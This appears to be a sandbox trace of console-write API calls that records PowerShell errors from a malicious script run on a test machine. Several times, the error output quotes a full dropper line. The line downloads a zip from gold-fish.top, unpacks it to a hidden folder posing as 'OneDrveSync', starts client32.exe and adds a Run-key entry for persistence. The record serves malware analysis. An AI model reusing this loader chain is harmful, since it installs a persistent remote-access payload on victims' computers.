WriteConsoleW
|
buffer:
The term 'Start-BitsTransfer' is not recognized as the name of a cmdlet, functi
console_handle:
0x00000023
|
1
|
1 |
0
|
WriteConsoleW
|
buffer:
on, script file, or operable program. Check the spelling of the name, or if a p
console_handle:
0x0000002f
|
1
|
1 |
0
|
WriteConsoleW
|
buffer:
ath was included, verify that the path is correct and try again.
console_handle:
0x0000003b
|
1
|
1 |
0
|
WriteConsoleW
|
buffer:
At C:\Users\test22\AppData\Local\Temp\script.ps1:1 char:143
console_handle:
0x00000047
|
1
|
1 |
0
|
WriteConsoleW
|
buffer:
+ cd $env:AppData; $link="https://gold-fish.top/glazgo.zip"; $path=$env:APPDATA
console_handle:
0x00000053
|
1
|
1 |
0
|
WriteConsoleW
|
buffer:
+"\dn.zip"; $pzip=$env:APPDATA+"\OneDrveSync"; Start-BitsTransfer <<<< -Source
console_handle:
0x0000005f
|
1
|
1 |
0
|
WriteConsoleW
|
buffer:
$link -Destination $Path; expand-archive -path .\dn.zip -destinationpath $pzip
console_handle:
0x0000006b
|
1
|
1 |
0
|
WriteConsoleW
|
buffer:
; $FOLD=Get-Item $pzip -Force; $FOLD.attributes='Hidden'; Remove-Item -path $pa
console_handle:
0x00000077
|
1
|
1 |
0
|
WriteConsoleW
|
buffer:
th; cd $pzip; start client32.exe; $fstr=$pzip+"\client32.exe"; New-ItemProperty
console_handle:
0x00000083
|
1
|
1 |
0
|
WriteConsoleW
|
buffer:
-Path "HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" -Name "OneDrveSync
console_handle:
0x0000008f
|
1
|
1 |
0
|
WriteConsoleW
|
buffer:
" -Value $fstr -PropertyType "String";
console_handle:
0x0000009b
|
1
|
1 |
0
|
WriteConsoleW
|
buffer:
+ CategoryInfo : ObjectNotFound: (Start-BitsTransfer:String) [],
console_handle:
0x000000a7
|
1
|
1 |
0
|
WriteConsoleW
|
buffer:
CommandNotFoundException
console_handle:
0x000000b3
|
1
|
1 |
0
|
WriteConsoleW
|
buffer:
+ FullyQualifiedErrorId : CommandNotFoundException
console_handle:
0x000000bf
|
1
|
1 |
0
|
WriteConsoleW
|
buffer:
The term 'expand-archive' is not recognized as the name of a cmdlet, function,
console_handle:
0x000000df
|
1
|
1 |
0
|
WriteConsoleW
|
buffer:
script file, or operable program. Check the spelling of the name, or if a path
console_handle:
0x000000eb
|
1
|
1 |
0
|
WriteConsoleW
|
buffer:
was included, verify that the path is correct and try again.
console_handle:
0x000000f7
|
1
|
1 |
0
|
WriteConsoleW
|
buffer:
At C:\Users\test22\AppData\Local\Temp\script.ps1:1 char:192
console_handle:
0x00000103
|
1
|
1 |
0
|
WriteConsoleW
|
buffer:
+ cd $env:AppData; $link="https://gold-fish.top/glazgo.zip"; $path=$env:APPDATA
console_handle:
0x0000010f
|
1
|
1 |
0
|
WriteConsoleW
|
buffer:
+"\dn.zip"; $pzip=$env:APPDATA+"\OneDrveSync"; Start-BitsTransfer -Source $link
console_handle:
0x0000011b
|
1
|
1 |
0
|
WriteConsoleW
|
buffer:
-Destination $Path; expand-archive <<<< -path .\dn.zip -destinationpath $pzip
console_handle:
0x00000127
|
1
|
1 |
0
|
WriteConsoleW
|
buffer:
; $FOLD=Get-Item $pzip -Force; $FOLD.attributes='Hidden'; Remove-Item -path $pa
console_handle:
0x00000133
|
1
|
1 |
0
|
WriteConsoleW
|
buffer:
th; cd $pzip; start client32.exe; $fstr=$pzip+"\client32.exe"; New-ItemProperty
console_handle:
0x0000013f
|
1
|
1 |
0
|
WriteConsoleW
|
buffer:
-Path "HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" -Name "OneDrveSync
console_handle:
0x0000014b
|
1
|
1 |
0
|
WriteConsoleW
|
buffer:
" -Value $fstr -PropertyType "String";
console_handle:
0x00000157
|
1
|
1 |
0
|
WriteConsoleW
|
buffer:
+ CategoryInfo : ObjectNotFound: (expand-archive:String) [], Comm
console_handle:
0x00000163
|
1
|
1 |
0
|
WriteConsoleW
|
buffer:
andNotFoundException
console_handle:
0x0000016f
|
1
|
1 |
0
|
WriteConsoleW
|
buffer:
+ FullyQualifiedErrorId : CommandNotFoundException
console_handle:
0x0000017b
|
1
|
1 |
0
|
WriteConsoleW
|
buffer:
Get-Item : Cannot find path 'C:\Users\test22\AppData\Roaming\OneDrveSync' becau
console_handle:
0x0000019b
|
1
|
1 |
0
|
WriteConsoleW
|
buffer:
se it does not exist.
console_handle:
0x000001a7
|
1
|
1 |
0
|
WriteConsoleW
|
buffer:
At C:\Users\test22\AppData\Local\Temp\script.ps1:1 char:246
console_handle:
0x000001b3
|
1
|
1 |
0
|
WriteConsoleW
|
buffer:
+ cd $env:AppData; $link="https://gold-fish.top/glazgo.zip"; $path=$env:APPDATA
console_handle:
0x000001bf
|
1
|
1 |
0
|
WriteConsoleW
|
buffer:
+"\dn.zip"; $pzip=$env:APPDATA+"\OneDrveSync"; Start-BitsTransfer -Source $link
console_handle:
0x000001cb
|
1
|
1 |
0
|
WriteConsoleW
|
buffer:
-Destination $Path; expand-archive -path .\dn.zip -destinationpath $pzip; $FOL
console_handle:
0x000001d7
|
1
|
1 |
0
|
WriteConsoleW
|
buffer:
D=Get-Item <<<< $pzip -Force; $FOLD.attributes='Hidden'; Remove-Item -path $pa
console_handle:
0x000001e3
|
1
|
1 |
0
|
WriteConsoleW
|
buffer:
th; cd $pzip; start client32.exe; $fstr=$pzip+"\client32.exe"; New-ItemProperty
console_handle:
0x000001ef
|
1
|
1 |
0
|
WriteConsoleW
|
buffer:
-Path "HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" -Name "OneDrveSync
console_handle:
0x000001fb
|
1
|
1 |
0
|
WriteConsoleW
|
buffer:
" -Value $fstr -PropertyType "String";
console_handle:
0x00000207
|
1
|
1 |
0
|
WriteConsoleW
|
buffer:
+ CategoryInfo : ObjectNotFound: (C:\Users\test22...ing\OneDrveSy
console_handle:
0x00000213
|
1
|
1 |
0
|
WriteConsoleW
|
buffer:
nc:String) [Get-Item], ItemNotFoundException
console_handle:
0x0000021f
|
1
|
1 |
0
|
WriteConsoleW
|
buffer:
+ FullyQualifiedErrorId : PathNotFound,Microsoft.PowerShell.Commands.GetIt
console_handle:
0x0000022b
|
1
|
1 |
0
|
WriteConsoleW
|
buffer:
emCommand
console_handle:
0x00000237
|
1
|
1 |
0
|
WriteConsoleW
|
buffer:
Property 'attributes' cannot be found on this object; make sure it exists and i
console_handle:
0x00000257
|
1
|
1 |
0
|
WriteConsoleW
|
buffer:
s settable.
console_handle:
0x00000263
|
1
|
1 |
0
|
WriteConsoleW
|
buffer:
At C:\Users\test22\AppData\Local\Temp\script.ps1:1 char:267
console_handle:
0x0000026f
|
1
|
1 |
0
|
WriteConsoleW
|
buffer:
+ cd $env:AppData; $link="https://gold-fish.top/glazgo.zip"; $path=$env:APPDATA
console_handle:
0x0000027b
|
1
|
1 |
0
|
WriteConsoleW
|
buffer:
+"\dn.zip"; $pzip=$env:APPDATA+"\OneDrveSync"; Start-BitsTransfer -Source $link
console_handle:
0x00000287
|
1
|
1 |
0
|
WriteConsoleW
|
buffer:
-Destination $Path; expand-archive -path .\dn.zip -destinationpath $pzip; $FOL
console_handle:
0x00000293
|
1
|
1 |
0
|
WriteConsoleW
|
buffer:
D=Get-Item $pzip -Force; $FOLD. <<<< attributes='Hidden'; Remove-Item -path $pa
console_handle:
0x0000029f
|
1
|
1 |
0
|
WriteConsoleW
|
buffer:
th; cd $pzip; start client32.exe; $fstr=$pzip+"\client32.exe"; New-ItemProperty
console_handle:
0x000002ab
|
1
|
1 |
0
|